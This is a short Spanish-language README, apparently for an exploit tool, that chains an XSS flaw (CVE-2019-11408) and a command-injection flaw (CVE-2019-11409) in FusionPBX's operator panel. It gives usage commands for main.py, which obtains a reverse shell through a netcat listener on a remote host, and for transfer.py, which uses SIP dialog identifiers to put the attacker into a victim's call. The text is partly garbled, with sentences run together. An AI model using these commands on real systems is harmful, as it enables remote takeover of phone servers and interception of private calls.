
Encadenar CVE-2019-11408 – XSS en el panel del operador y CVE-2019-11409 – Inyección de comandos en el panel del operador.
Este simple código intenta completar la implementación de la vulnerabilidad encadenada presentada por Dustin Cobb en RCE mediante Caller ID – Múltiples vulnerabilidades en FusionPBX.
netcat en un sistema remoto (rce_listener_address).x`python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}netcat y proporcionará una shell inversaUna vez que conocemos el Call-ID, el from-tag y el to-tag de una llamada, ejecutar el siguiente código te colocará a ti en lugar de la víctima en la llamada.
python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}